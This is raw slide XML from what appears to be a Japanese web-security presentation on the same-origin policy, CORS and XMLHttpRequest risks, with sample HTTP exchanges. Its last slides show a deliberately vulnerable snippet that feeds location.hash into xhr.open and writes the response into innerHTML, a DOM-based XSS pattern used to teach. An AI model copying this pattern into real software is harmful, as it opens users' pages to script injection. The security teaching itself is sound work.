              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>example.jp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/image.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400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endParaRPr lang="en-US" altLang="ja-JP" sz="2400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sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>example.jp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/index.html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03648" y="5241250"/>
            <a:ext cx="7200800" cy="830997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  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://example.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://example.jp:8080</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33633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同一オリジン</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ポリシ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ー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同一オリジンポリシー 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Same-Origin Policy - SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>オリジンが異なる場合に様々な制約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XHR</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>での</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>読み取り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localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の読み書き範囲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などなど</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>cookie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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>認証はオリジンをベースとしていない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5576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Cross-Origin Resource Sharing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CORS - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Cross-Origin Resource Sharing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>オリジンを超えてリソースを共有するための統一的なルール</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>Cross-Origin Resource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Sharing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="20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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://www.w3.org/TR/cors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="20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/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>HTTP access control (CORS) | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MDN</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="18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https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="0" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="18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developer.mozilla.org/ja/docs/HTTP_access_control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>XHR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>img+Canvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Web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Fonts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>など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56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XHR with CORS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377349"/>
            <a:ext cx="7200800" cy="1477328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92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// http://base.example.jp/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var xhr = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF7D7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r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();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xhr.open( "GET", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://another.example.jp/"</a:t>
            </a:r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, true );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xhr.onreadystatechange = function(){ ... };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xhr.send( null );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2961525"/>
            <a:ext cx="7200800" cy="1200329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GET / HTTP/1.1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Host: another.example.jp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User-Agent: Mozilla/5.0 (Windows NT 6.1)... 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Origin: http://base.example.jp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255928"/>
            <a:ext cx="7200800" cy="1477328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Date: Tue, 28 Feb 2013 12:34:56 GMT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Access-Control-Allow-Origin: http://base.example.jp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Content-Type: text/html; charset=utf-8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  <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF7D7D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65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XHR with CORS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377349"/>
            <a:ext cx="7200800" cy="1754326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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// http://base.example.jp/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var xhr = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF7D7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r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();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xhr.open( "GET", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://another.example.jp/"</a:t>
            </a:r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, true );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF7D7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhr.withCredentials = true;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xhr.onreadystatechange = function(){ ... };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhr.send( null );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3177549"/>
            <a:ext cx="7200800" cy="1477328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GET / HTTP/1.1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Host: another.example.jp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User-Agent: Mozilla/5.0 (Windows NT 6.1)...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Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF7D7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sessionid</a:t>
            </a:r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=135A2387BC12EE0F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Origin: http://base.example.jp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687976"/>
            <a:ext cx="7200800" cy="1754326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Date: Tue, 28 Feb 2013 12:34:56 GMT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Access-Control-Allow-Origin: http://base.example.jp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Access-Control-Allow-Credentials: true</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7D7D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Content-Type: text/html; charset=utf-8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  <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF7D7D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7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Images </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>with CORS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377349"/>
            <a:ext cx="7200800" cy="923330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// http://base.example.jp/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&lt;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img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src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="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http://another.example.jp/html5.png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"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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF7D7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>crossorigin</a:t>
            </a:r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="anonymous"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&gt;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2420888"/>
            <a:ext cx="7200800" cy="1200329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GET /takahiro.jpg HTTP/1.1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Host: another.example.jp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User-Agent: Mozilla/5.0 (Windows NT 6.1)...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Origin: http://base.example.jp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3717032"/>
            <a:ext cx="7200800" cy="1477328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Date: Tue, 28 Feb 2013 12:34:56 GMT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Access-Control-Allow-Origin: http://base.example.jp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Content-Type: image/jpeg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  <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF7D7D"/>
              </a:solidFill>
              <a:latin typeface="Consolas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301208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Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>がつき、</a:t>
            </a:r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Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>は送信されない</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
              <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>Canvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>経由で読み取り可能になる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" b="1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951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Images with CORS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1377349"/>
            <a:ext cx="7200800" cy="923330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// http://base.example.jp/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&lt;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img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src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="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http://another.example.jp/html5.png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"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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF7D7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>crossorigin</a:t>
            </a:r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="use-credentials"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&gt;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2420888"/>
            <a:ext cx="7200800" cy="1477328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GET /takahiro.jpg HTTP/1.1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Host: another.example.jp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User-Agent: Mozilla/5.0 (Windows NT 6.1)...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Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF7D7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sessionid</a:t>
            </a:r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=135A2387BC12EE0F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Origin: http://base.example.jp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4005064"/>
            <a:ext cx="7200800" cy="1754326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Date: Tue, 28 Feb 2013 12:34:56 GMT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Access-Control-Allow-Origin: http://base.example.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF7D7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Credentials: true</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7D7D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Content-Type: image/jpeg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  <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF7D7D"/>
              </a:solidFill>
              <a:latin typeface="Consolas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11760" y="5847655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400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>Canvas</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>経由で読み取り可能になる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
              <a:ea typeface="メイリオ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82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smtClean="0"/>
              <a:t>Access-Control-Allow-Origin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Access-Control-Allow-Origin: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>誰からでも読み取り可能</a:t>
            </a:r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endParaRPr lang="en-US" altLang="ja-JP" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>機密情報を含むコンテンツの場合、罠ページからも読み取られれてしまう！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" smtClean="0"/>
          </a:p>
          <a:p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780928"/>
            <a:ext cx="7200800" cy="1631216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solidFill>
                  <a:schemeClr val="bg1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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Date: Tue, 28 Feb 2013 12:34:56 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF7D7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin: *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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: text/html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF7D7D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57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ここまでのまとめ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 dirty="0" smtClean="0"/>
              <a:t>オリジン</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>スキーム、ホスト、ポートの組み合わせ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>同一オリジンポリシー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オリジン</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を境界としてリソースの読み書きを保護する仕組みの総称</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0"/>
              <a:t> – Cross-Origin Resource Sharing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オリジンを超えてリソースを共有するためのルール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preflight – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>今回は説明を省略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ブラウザを狙う攻撃は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>回避の受動的攻撃</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p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825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XMLHttpRequest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7760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自己紹介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kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>はせがわようすけ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ネットエージェント株式会社 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>株式会社セキュアスカイ・テクノロジー </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>技術顧問</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Microsoft MVP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>for Consumer Security Oct 2005 - </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0"/>
              <a:t>http://utf-8.jp/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP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877272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XMLHttpRequest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言うまでもなく今どきの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>アプリの要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Lv.2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>によりクロスオリジン通信可能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XHR</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>周辺に脆弱性も多い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よくある脆弱性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意図せずクロスオリジン通信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>意図</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>せずクロスオリジン通信→データ漏えい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Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>データを悪用して</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>データ内の機密情報漏えい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2855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XMLHttpRequest</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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意図せずクロスオリジン通信→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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8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XHR: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>意図せずクロスオリジン通信→</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="3200" dirty="0" smtClean="0"/>
              <a:t>XSS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XHR Lv.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>で脆弱になった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クロスオリジン通信できない間は安全だった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708920"/>
            <a:ext cx="7200800" cy="2862322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// http://example.jp/#/news</a:t>
            </a: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var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err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r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=</a:t>
            </a:r>
            <a:b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</a:b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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>decodeURIComponent</a:t>
            </a:r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( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>location.hash.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(1)</a:t>
            </a:r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);</a:t>
            </a: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var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= new XMLHttpRequest();</a:t>
            </a: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xhr.open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( "GET",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url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, true );</a:t>
            </a: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xhr.onreadystatechange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= function(){</a:t>
            </a:r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 if(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xhr.readyState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== 4 &amp;&amp;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xhr.status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== 200 ){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     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div.innerHTML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 = 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xhr.responseText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</a:t>
            </a:r>
          </a:p>
          <a:p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}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644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3200" dirty="0" smtClean="0"/>
              <a:t>XHR: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>意図せずクロスオリジン通信→</a:t>
            </a:r>
            <a:r>
